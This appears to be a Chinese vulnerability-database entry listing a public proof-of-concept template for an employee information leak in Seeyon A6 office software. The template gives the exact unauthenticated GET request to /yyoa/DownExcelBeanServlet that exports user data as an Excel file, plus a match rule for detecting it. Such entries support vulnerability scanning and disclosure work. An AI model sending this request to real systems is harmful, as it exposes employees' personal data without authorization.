seeyon-a6-employee-info-leak: seeyon a6 employee info leak

日期: 2025-08-01 | 影响软件: seeyon a6 | POC: 已公开

漏洞描述

app="Seeyon-A6"

PoC代码[已公开]

id: seeyon-a6-employee-info-leak

info:
  name: seeyon a6 employee info leak
  author: sakura404x
  severity: high
  verified: true
  description: |-
    app="Seeyon-A6"
  tags: seeyon,disclosure
  created: 2023/10/29

rules:
  r0:
    request:
      method: GET
      path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
    expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
expression: r0()

相关漏洞推荐